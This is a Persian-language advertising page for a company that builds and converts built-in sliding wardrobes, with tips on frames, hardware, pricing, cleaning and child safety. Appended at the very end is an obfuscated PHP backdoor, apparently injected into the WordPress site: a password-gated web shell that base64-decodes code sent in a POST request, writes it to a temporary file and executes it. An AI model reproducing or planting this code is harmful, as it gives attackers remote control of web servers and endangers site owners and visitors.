کمد دیواری

کمد دیواری

تلفن تماس بهینه ساز
به صفحه کمد دیواری صنایع تولیدی و خدماتی بهینه ساز خوش آمدید، اکنون که صفحه ساخت کمد کشویی و نمونه کارهای تبدیل کمد لولایی به ریلی صنایع بهینه ساز را مشاهده می کنید شاید برایتان جای سوال باشد که از کجا متوجه شویم که به کدام گروه تولیدی اعتماد کنیم تا به ما بهترین قیمت کمد دیواری را بدهد.
در زیر توجه شما را به دانستن نکاتی که در ساخت کمد حائز اهمیت است جلب می کنم :
۱- چهارچوب کمد دیواری حتما باید فلزی باشد.به خاطر اینکه در چارچوب فلزی کمد از نظر استحکام بسیار محکم تر از کمد دیواری است که چارچوب آن به صورت دوبل شده از ام دی اف باشد. زمانی به مشکل بر می خوریم که وسایل را داخل کمد دیواری می چینیم و آن موقع هست که متوجه می شویم کمد با چهارچوب ام دی اف تمامی طبقاتش شکم می کند ولی در فلزی به خاطر داشتن زوار طبقه کاملا داخل زوار می افتد و وزن سنگین را تحمل می کند.

کمد دیواری

۲- در کمد دیواری ریلی، یراق آلات بسیار اهمیت دارد.متاسفانه در بازار ایران یراق آلات چینی بسیار زیاد می باشد که با کیفیت های متفاتی نیز وجود دارد و شمایی که به عنوان مشتری می خواهید از کمد استفاده کنید خبری از کیفیت محصولات بکار رفته شده در کمد دیواری خود ندارید و این به وجدان مجری کار شما بستگی دارد که بهترین یراق آلات را برای شما استفاده کند.

قیمت کمد دیواری

۳- درباره قیمت کمد دیواری نیز باید بگویم که سبک های ساخت کمد متفاوت است، شما باید به عنوان مشتری سعی کنید اول دقیقا به مجری کار بگویید که چه نوع کمد با چه تعداد طبقه و کشو لازم دارید تا مجری کار با توجه به انداره شما،مدل، نوع جنس و یراق آلات مصرفی قیمت دقیق کمد دیواری را اطلاع دهد. حائز اهمیت است که گفته شود به دنبال قیمت پایین کمد ریلی نباشید به دنبال کار با کیفیت باشید.به همان اندازه که قیمت کمد دیواری کشویی اهمیت بالایی دارد به همان اندازه کیفیت نیز از درجه اهمیت بالایی برخوردار است.

ساخت کمد

نحوه محاسبه متراژ کمد دیواری

۴- درباره محاسبه متراژ کمد دیواری نیز باید بگوییم که خانه ها یا دفاتری که کمد ندارند طول دیواری که می خواهید کمد نصب گردد در ارتفاع کمد باید ضرب گردد تا متر مربع کمد دیواری محاسبه شود. معمولا ارتفاع کمد را تا زیر سقف در نظر می گیرند ولی برای خانه ها و یا دفاتری که کمد دارند و جهت تبدیل درب لولایی آن به درب ریلی اقدام نموده اند، ضرب طول کمد در ارتفاع کمد نحوه محاسبه کردن متر متربع کمد دیواری می باشد. که از این طریق قیمت کمد کشویی محاسبه می گردد.

کمد دیواری ریلی

طریقه تبدیل کمد لولایی به کمد ریلی

ابتدا بعد از تماس شما مشتریان عزیز نسبت به تبدیل کمدهای لولایی شما به کمد ریلی، کارشناسان ما در منزل شما حاظر شده و اطلاعات لازم را در مورد این کار در اختیار شما قرار می دهند ولی در حال حاظر می خواهیم شما را از طریقه عملکردمان آگاه سازیم :
۱- ابتدا باید چهارچوب فلزی کمد شما تغییر یابد که ما چون تمامی کارهای ساختمانی را انجام می دهیم بابت آهنگری و تغییرات کمد دیواری هیچ مشکلی نخواهیم داشت.
۲- سپس با توجه به چهارچوب تبدیل شده به سبک چهارچوب کمد ریلی با توجه به نظر مشتری یا ریل را داخل کمد یا خارج کمد کار می کنیم، در صورتی که ریل داخل باشد باید از لبه کمد تا چهارچوب فلزی ۶ سانت فاصله داشته باشد در غیر این صورت ریل بیرون کار قرار گرفته و دور آن با ام دی اف پوشانده می شود.
۳- چون با تغییر دادن چهارچوب، طبقه بندی های داخل در اکثر موارد بهم می ریزد با توجه به سلیقه مشتری طبقه بندی، کشوی داخل کمد و غیره اندازه گیری و ساخته شده و به همراه درب های ریلی آماده نصب می گردند.

کمد

۴- در مرحله آخر تمامی قطعات ساخته شده نصب می گردد و کار آماده تحویل می باشد.
ما در مجموع تمامی این موارد را خدمت شما مشتریان عزیز توضیح می دهیم تا بتوانید به راحتی نسبت به فرآیند کار خود تصمیم گیری های لازم را انجام دهید.

 • ساخت انواع کمد دیواری
 • ساخت کمد ام دی اف
 • ساخت کمد هایگلاس
 • ساخت کمد اداری
 • ساخت کمد دیواری ریلی
 • ساخت کمد کشویی
 • ساخت کمد لباس
 • ساخت کمد جا کفشی
 • ساخت کمد جالباسی
 • کمد اتاق خواب
 • کمد تختخواب شو

 آنچه درباره کمد دیواری باید بدانید:

خیلی ها موقع خرید یا اجاره کردن خانه، پس از دیدن و پسندیدن آشپزخانه، اتاق ها را از نظر داشتن کمد دیواری بررسی می کنند که کمدهایی بزرگ و جادار داشته باشند. خیلی ها بر این باورند که کمدهای بزرگ و جادار در یک خانه حتی می توانند نقش یک اتاق را ایفا کنند.

کمد دیواری ام دی اف
واقعیت این است که وجود کمد در هر خانه یک امتیاز محسوب می شود چرا که اگر بزرگ و جادار باشد هم جایی برای ذخیره وسایل اضافی است و هم جای خوبی برای نگهداری ظروف اضافی، کتاب، رختخواب، میز اتو، میز چرخ خیاطی و انواع لباس ها… کمد دیواری نباید فقط به عنوان مکانی برای انبار کردن لوازم اضافی باشد. بهتر است داخل کمد طبقه بندی شود تا وسایل به تفکیک درون آن قرار بگیرد. اگر فضای داخل کمد بزرگ است می توان لوازم را در هر طبقه به طور مجزا در آن چید.
کمد اتاق خواب
بسیاری از خانه های امروزی آن قدر بزرگ نیست که چند کمد داشته باشد، بنابراین با طبقه بندی مناسب می توان خیلی از وسایل اضافی را درون کمد قرار داد؛ مثلا طبقه ای برای مرتب چیدن کتاب ها، قرار دادن لباس ها، گذاشتن میز اتو و اتو و… مهم این است که همه وسایل در جای خودشان به طور مرتب و منظم قرار بگیرند تا در موقع لزوم بتوان به راحتی به آنها دسترسی داشت.

● نظافت کمد کشویی

بهتر است کمد دیواری کشویی را حداقل هر ماه یکبار تمیز کنیم. برای این کار لازم است وسایل داخل آن را خالی کنیم. بهتر است هر طبقه از کمد دیواری را به طور مجزا خالی کنیم و بعد از تمیز کردن هر طبقه، وسایل آن را مجددا دورن آن بگذاریم. با یک دستمال مرطوب، کف و دیواره های آن را گردگیری کنیم و سپس با یک دستمال خشک آن را خشک کنیم تا کاملا تمیز شود.

کمد هایگلاس
برخی خانم ها روی طبقه بندی کمد کشویی را با یک مشمع یا تکه ای موکت تمیز می پوشانند؛ بهتر است آن موکت یا مشمع هم برداشته شود و بعد از شستشو مجددا کف طبقه پهن شود. بعد از پاک کردن طبقه ها باید لوازم داخل آن هم کاملا تمیز و گردگیری شود و سپس هر کدام سرجای مخصوص خود قرار بگیرد. یک نکته که باید به آن توجه کنیم این است که کمد، بهتر است نزدیک مکان های مرطوب و نمناک مثل حمام و دستشویی نباشد. گاهی اوقات بخشی از کمد دیواری را به چیدن رختخواب اختصاص می دهیم.
ساخت کمد
اگر شما هم این کار را می کنید، توجه کنید که دیوار پشتی کمد ریلی نمناک نباشد چون سبب مرطوب و نم دار شدن رختخواب می شود و چون رطوبت و تاریکی جای مناسبی برای رشد سریع قارچ ها و میکروب ها است این نم سبب تشکیل قارچ و گاه کپک می شود. بنابراین بهتر است هر از چند گاهی درب کمد دیواری باز بماند تا هوا در داخل کمد جریان پیدا کند و از ایجاد کپک جلوگیری شود و بوی نامطبوع آن از بین برود. همچنین در صورتی که از رختخواب ها و لباس ها به مدت طولانی استفاده نکرده اید حتما آنها را از داخل کمد خارج کنید و اجازه دهید هوا در میان آنها جریان پیدا کند.
کمد ریلی

● قفسه های بالایی کمد دیواری

قفسه های بالایی کمد دیواری هم جایی مناسب برای لوازمی است که زیاد مورد استفاده قرار نمی گیرند. بنابراین قبل از چیدمان لوازم، آنها را دسته بندی کنید و لوازمی را که احتیاج ندارید در بخش بالایی کمد بگذارید. البته یادتان نرود این مکان هم باید هرچند وقت یکبار تمیز و مرتب شود و حتی و سایل به طور مرتب و منظم در آن چیده شود. نکته مهم دیگر این است که برای برداشتن اشیایی که در طبقات بالایی کمد قرار دارد بهتر است از یک چهارپایه محکم با ضامن ایمنی که ارتفاع آن مناسب است استفاده کنید. بعضی ها برای برداشتن لوازم ضروری خود از بالش روی چهارپایه های کوچک استفاده می کنند. قرار دادن یک یا دو بالش روی چهارپایه و بالا رفتن از آن برای برداشتن وسایل، کار بسیار خطرناکی است و چه بسا سبب سقوط از آن و بروز شکستگی دست و پا می شود.
کمد ریلی

● یک ابتکار

اگر در دیوارهای اتاق های منزل تان فرورفتگی هایی با حداقل ۳۰ سانتی متر عرض وجود دارد، می توانید دیوار را به یک کمد دیواری سراسری از کف تا سقف تبدیل کنید و از آن استفاده کنید. این کمد را می توانید قفسه بندی کنید و جایی درست کنید که از آن برای آویختن لباس های خود و افراد خانواده تان استفاده کنید.

حتی می توانید بسیاری از لوازم و خرده ریز های مختلف را در آن قرار دهید.

● اصول ایمنی کمد دیواری

اگر در خانه کودک نوپایی دارید، از آنجا که کودکان در این سن بسیار کنجکاو و فعال هستند قطعا دیده اید که زیاد به سراغ کمددیواری می روند و می خواهند همه چیز را بیرون بریزید. بنابراین بهتر است برای حفظ ایمنی کودک خود این نکات را در مورد ایمنی کمد دیواری رعایت کنید:

▪ درب کمد را حتما بعد از استفاده و برداشتن هر وسیله ای قفل کنید تا کودک داخل کمد نرود و از گیر افتادن او در کمد جلوگیری شود.

قیمت کمد کشویی

▪ اشیای خطرناک، نوک تیز و دارای گوشه های برنده را در طبقات بالاتر کمد دیواری قرار دهید تا از دسترس کودک دور باشد.

▪ لوازمی مانند میز اتو و خود اتو را طوری در کمد قرار دهید که دور از دسترس کودکان باشد و احتمال افتادن و سقوط آنها به حداقل برسد.

▪ هرگز وسایل تیز و خطرناکی مانند قیچی، چاقو، پیچ گوشتی و سوزن را بدون اینکه درون ظروف مخصوص دردار قرار دهید، در کمد رها نکنید.

▪ صندلی، چهارپایه و جعبه را در کنار کمد قرار ندهید چون ممکن است کودکان از آن بالا رفته و به طبقات بالا دسترسی پیدا کنند.

▪ کلید درب کمد را بعد از انجام کار از روی آن بردارید تا کودک نتواند درب آن را باز کند.

▪ برای ایمنی بیشتر می توانید از قفل و دستگیره های مخصوص کودکان استفاده کرده و روی در کمددیواری قفل کودک نصب کنید.

کمد دیواری مدرن :

کمد دیواری ریلی
قیمت کمد کشویی
کمد لولایی
تبدیل کمد لولایی به ریلی
قیمت کمد ریلی
قیمت ساخت کمد
ساخت کمد دیواری ریلی
تلفن تماس بهینه ساز

بیشتر بدانید : 

→ خواندن مطلب قبلی

بازسازی ساختمان

خواندن مطلب بعدی ←

درب و پنجره فلزی

نوشتن نظر شما

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}